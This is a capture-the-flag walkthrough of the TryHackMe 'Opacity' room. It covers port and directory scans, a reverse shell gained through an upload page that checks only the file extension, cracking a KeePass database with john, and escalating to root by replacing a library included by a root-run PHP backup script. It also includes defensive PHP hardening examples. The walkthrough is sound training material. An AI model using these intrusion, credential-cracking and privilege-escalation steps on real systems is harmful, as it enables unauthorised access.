TryHackMe: Opacity

Opacity was a very simple room, not much to say about it. I like every room, but some are sort of boring. I still feel motivated, just seeking a bigger challenge, but I don’t want to go up two steps at once. Let the wind blow you in the right way.

Room https://tryhackme.com/room/opacity

Initial Enumeration

Nmap Scan

We start with our nmap scan:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.131.208
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 14:48 GMT
Nmap scan report for 10.10.131.208
Host is up (0.061s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:ee:29:10:d9:8e:8c:53:e6:4d:e3:67:0c:6e:be:e3 (RSA)
|   256 95:42:cd:fc:71:27:99:39:2d:00:49:ad:1b:e4:cf:0e (ECDSA)
|_  256 ed:fe:9c:94:ca:9c:08:6f:f2:5c:a6:cf:4d:3c:8e:5b (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-02-12T14:49:16
|_  start_date: N/A
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.63 seconds

Web 80

We see SMB running, but we can’t get anything out of it, so we move on to port 80.

[Screenshot: Web 80]

Gobuster Scan

Nothing that we could find at first glance, so we do our gobuster scan:

┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ".txt,.html,.php" -t 25 --timeout 20s -u http://10.10.131.208 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.131.208
[+] Method:                  GET
[+] Threads:                 25
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,php
[+] Timeout:                 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.php            (Status: 302) [Size: 0] [--> login.php]
/login.php            (Status: 200) [Size: 848]
/css                  (Status: 301) [Size: 312] [--> http://10.10.131.208/css/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/cloud                (Status: 301) [Size: 314] [--> http://10.10.131.208/cloud/]
...

We found a cloud directory, and inside it we find the following:

[Screenshot: Web 80 Cloud]

It is a web page where we can enter an image URL, and it stores the fetched file for five minutes. After some playing around, we learned that it only checks whether the URL ends in .jpg, .png, etc., not whether the URL really points to an image.
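The check the page relies on is a suffix match on the URL string, which says nothing about the bytes that come back. The following is an added example for this write-up, not the room's code: the suffix-only check beside a version that restricts the scheme and target, caps the download, decodes the content to confirm it is an image, and stores it under a server-chosen name. The function names, the `$storeDir` argument and the storage path in the usage comment are assumptions.

```php
<?php
// Added example for this write-up; it is not the Opacity room's code. Names
// (extensionOnlyCheck, fetchAndStoreImage, $storeDir) are assumptions.

// Weak check of the kind the write-up describes: it inspects only how the URL
// string ends, so any resource with an image-like suffix is accepted, whatever
// its bytes actually are.
function extensionOnlyCheck(string $url): bool
{
    return (bool) preg_match('/\.(jpe?g|png|gif)$/i', $url);
}

// Hardened version: restrict the scheme, refuse private/loopback targets,
// cap the download, decode the bytes to confirm they are an image, and
// store under a server-chosen name whose extension comes from the detected
// type, never from the URL.
function fetchAndStoreImage(string $url, string $storeDir, int $maxBytes = 2097152): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Resolve once and reject addresses in private or reserved ranges so the
    // fetcher cannot be pointed at internal services. gethostbyname() returns
    // the input unchanged on failure, which filter_var() then rejects.
    $ip = gethostbyname($parts['host']);
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
        return null;
    }

    $ctx = stream_context_create([
        'http' => ['timeout' => 5, 'follow_location' => 0],
    ]);
    // Read at most $maxBytes + 1 so an oversized body is detected and dropped.
    $data = @file_get_contents($url, false, $ctx, 0, $maxBytes + 1);
    if ($data === false || strlen($data) > $maxBytes) {
        return null;
    }

    // getimagesizefromstring() parses the real content; anything that is not a
    // decodable image (a PHP script, for instance) yields false.
    $info = @getimagesizefromstring($data);
    if ($info === false) {
        return null;
    }
    $allowed = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];
    if (!isset($allowed[$info[2]])) {
        return null;
    }

    // Name chosen by the server from the detected type; the URL never
    // influences the stored filename.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
    $path = rtrim($storeDir, '/') . '/' . $name;
    if (file_put_contents($path, $data) === false) {
        return null;
    }
    return $name;
}

// Usage (assumed storage path): keep $storeDir outside the document root, or
// serve it with PHP execution disabled for that directory.
// $name = fetchAndStoreImage($_POST['url'] ?? '', '/var/lib/cloud-images');
```

The two checks that matter here are decoding the content rather than trusting the suffix, and never letting the requester choose the stored filename. The private-range filter is a single resolution and does not cover DNS rebinding; a production fetcher would also pin the resolved address for the actual request.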

Shell as www-data

This means we can send a reverse shell without any problems. We first start a Python HTTP server and a listener on our machine and then enter the following on the page:

[Screenshot: Shell Upload]

Now we just have to go to the page that was created and remove the image extension that we added:

[Screenshot: Web Shell]

And we are in:

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
...
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Shell as sysadmin

While enumerating, we can find, inside the opt folder, a .kdbx file:

$ ls -la
total 12
drwxr-xr-x  2 root     root     4096 Jul 26  2022 .
drwxr-xr-x 19 root     root     4096 Jul 26  2022 ..
-rwxrwxr-x  1 sysadmin sysadmin 1566 Jul  8  2022 dataset.kdbx

After a simple Google search, we find an Exploit Notes page explaining what this file is and how to access it, so all we have to do is follow the steps. We first download the file to our machine through netcat and then use keepass2john to create a hash that we can feed to the normal john to get the password for the KeePass database:

┌──(kali㉿kali)-[~/Desktop]
└─$ keepass2john dataset.kdbx > hash
┌──(kali㉿kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash              
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (dataset)     
1g 0:00:00:06 DONE (2025-02-12 15:36) 0.1536g/s 135.1p/s 135.1c/s 135.1C/s chichi..david1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We can then use the password to open the KeePass file and get access to the database:

[Screenshot: KeePassXC Creds]

Inside, we see the sysadmin's SSH credentials, so we can log in as sysadmin and get the local flag:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh sysadmin@10.10.131.208                  
sysadmin@10.10.131.208's password: 
sysadmin@opacity:~$ ls
local.txt  scripts
sysadmin@opacity:~$ cat local.txt
[REDACTED]

Shell as root

Inside sysadmin's home, we found a folder called scripts that contained another folder called lib and a script.php file with the following code:

<?php

//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;

//Files scheduled removal
$dir = "/var/www/html/cloud/images";
if(file_exists($dir)){
    $di = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);
    $ri = new RecursiveIteratorIterator($di, RecursiveIteratorIterator::CHILD_FIRST);
    foreach ( $ri as $file ) {
        $file->isDir() ?  rmdir($file) : unlink($file);
    }
}
?>

After looking inside the lib folder, we see that we can’t edit the backup.inc.php file, but we can remove it. This means that we can upload our own copy of the file and get a root shell.
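The root cause is a root-run job that `require_once()`s code from a directory its owner does not control. As an added example for this write-up (not the room's script.php), the include below is guarded: it refuses to load the library unless the file and every directory above it are owned by root and writable only by root, so a replaced `backup.inc.php` aborts the job instead of running as root. The function name `requireTrusted` is an assumption; the library path and `zipData()` call are the ones the write-up's script uses.

```php
<?php
// Added example for this write-up; not the room's script.php. The function
// name requireTrusted is an assumption; the library path is the one the
// backup script in the write-up uses.

// Refuse to include a library unless the file and every directory above it
// are owned by root and writable by root only. A root cron job that
// require_once()s code from a directory another user can write to (or
// delete from and recreate in) hands that user root.
function requireTrusted(string $path): void
{
    $real = realpath($path);   // resolves symlinks before any check
    if ($real === false) {
        throw new RuntimeException("library not found: $path");
    }
    for ($p = $real; ; $p = dirname($p)) {
        $st = stat($p);
        if ($st === false) {
            throw new RuntimeException("cannot stat $p");
        }
        if ($st['uid'] !== 0) {
            throw new RuntimeException("$p is not owned by root (uid {$st['uid']})");
        }
        // 0022 isolates the group-write and other-write bits of st_mode.
        if (($st['mode'] & 0022) !== 0) {
            throw new RuntimeException("$p is group- or world-writable");
        }
        if ($p === dirname($p)) {
            break; // reached '/'
        }
    }
    require_once $real;
}

// The write-up's backup script includes unconditionally; here the include is
// guarded, and the job aborts (visible in cron's mail or log) rather than
// executing whatever sits in a user-writable lib/ directory.
requireTrusted('/home/sysadmin/scripts/lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;
```

With the path from the write-up this guard will always abort, because `/home/sysadmin` is owned by sysadmin, which is the point: the structural fix is to move root-run code and its libraries to a root-owned location (an assumed example would be `/usr/local/lib/backup/`) and keep the ownership check as a tripwire. The stat-then-include sequence is still a small race window, so the check complements correct placement rather than replacing it.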

We will just use a simple PHP file containing only an exec() call with the reverse shell inside. After that, we just have to place the file in the lib folder and wait a bit; we get a root shell and can then read the proof flag:

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
...
root@opacity:~# ls
proof.txt
snap
root@opacity:~# cat proof.txt
[REDACTED]

This post is licensed under CC BY 4.0 by the author.